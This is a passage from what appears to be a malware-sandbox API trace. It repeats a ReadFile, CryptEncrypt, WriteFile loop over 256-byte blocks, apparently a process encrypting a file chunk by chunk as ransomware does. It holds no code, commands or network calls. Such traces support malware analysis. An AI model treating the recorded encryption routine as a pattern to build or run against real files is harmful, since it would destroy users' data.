lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.576] CryptEncrypt (in: hKey=0x9ad678, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.576] GetLastError () returned 0x0 [0167.576] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.576] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.576] CryptEncrypt (in: hKey=0x9ad678, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.576] GetLastError () returned 0x0 [0167.576] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.576] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.576] CryptEncrypt (in: hKey=0x9ad678, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.576] GetLastError () returned 0x0 [0167.576] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.576] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.576] CryptEncrypt (in: hKey=0x9ad678, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.576] GetLastError () returned 0x0 [0167.576] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.576] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.576] CryptEncrypt (in: hKey=0x9ad678, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.576] GetLastError () returned 0x0 [0167.576] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.576] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.576] CryptEncrypt (in: hKey=0x9ad678, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.576] GetLastError () returned 0x0 [0167.576] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.576] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.577] CryptEncrypt (in: hKey=0x9ad678, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.577] GetLastError () returned 0x0 [0167.577] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.577] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.577] CryptEncrypt (in: hKey=0x9ad678, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.577] GetLastError () returned 0x0 [0167.577] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.577] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.577] CryptEncrypt (in: hKey=0x9ad678, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.577] GetLastError () returned 0x0 [0167.577] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.577] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.577] CryptEncrypt (in: hKey=0x9ad678, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.577] GetLastError () returned 0x0 [0167.577] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.577] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.577] CryptEncrypt (in: hKey=0x9ad678, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.577] GetLastError () returned 0x0 [0167.577] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.577] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.577] CryptEncrypt (in: hKey=0x9ad678, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.577] GetLastError () returned 0x0 [0167.577] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.577] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.577] CryptEncrypt (in: hKey=0x9ad678, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.577] GetLastError () returned 0x0 [0167.577] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.578] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.578] CryptEncrypt (in: hKey=0x9ad678, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.578] GetLastError () returned 0x0 [0167.578] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.578] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.578] CryptEncrypt (in: hKey=0x9ad678, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.578] GetLastError () returned 0x0 [0167.578] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.578] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.578] CryptEncrypt (in: hKey=0x9ad678, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.578] GetLastError () returned 0x0 [0167.578] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.578] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.578] CryptEncrypt (in: hKey=0x9ad678, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.578] GetLastError () returned 0x0 [0167.578] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.578] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.578] CryptEncrypt (in: hKey=0x9ad678, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.578] GetLastError () returned 0x0 [0167.578] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.578] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.578] CryptEncrypt (in: hKey=0x9ad678, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.578] GetLastError () returned 0x0 [0167.578] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.578] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.579] CryptEncrypt (in: hKey=0x9ad678, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.579] GetLastError () returned 0x0 [0167.579] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.579] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.579] CryptEncrypt (in: hKey=0x9ad678, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.579] GetLastError () returned 0x0 [0167.579] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.579] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.579] CryptEncrypt (in: hKey=0x9ad678, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.579] GetLastError () returned 0x0 [0167.579] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.579] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.579] CryptEncrypt (in: hKey=0x9ad678, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.579] GetLastError () returned 0x0 [0167.579] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.579] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.579] CryptEncrypt (in: hKey=0x9ad678, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.579] GetLastError () returned 0x0 [0167.579] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.579] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.579] CryptEncrypt (in: hKey=0x9ad678, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.579] GetLastError () returned 0x0 [0167.579] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.579] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.579] CryptEncrypt (in: hKey=0x9ad678, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.579] GetLastError () returned 0x0 [0167.579] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.580] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.580] CryptEncrypt (in: hKey=0x9ad678, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.580] GetLastError () returned 0x0 [0167.580] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.580] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.580] CryptEncrypt (in: hKey=0x9ad678, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.580] GetLastError () returned 0x0 [0167.580] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.580] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.580] CryptEncrypt (in: hKey=0x9ad678, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.580] GetLastError () returned 0x0 [0167.580] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.580] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.580] CryptEncrypt (in: hKey=0x9ad678, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.580] GetLastError () returned 0x0 [0167.580] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.580] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.580] CryptEncrypt (in: hKey=0x9ad678, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.580] GetLastError () returned 0x0 [0167.580] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.580] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.580] CryptEncrypt (in: hKey=0x9ad678, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.580] GetLastError () returned 0x0 [0167.580] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.580] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, 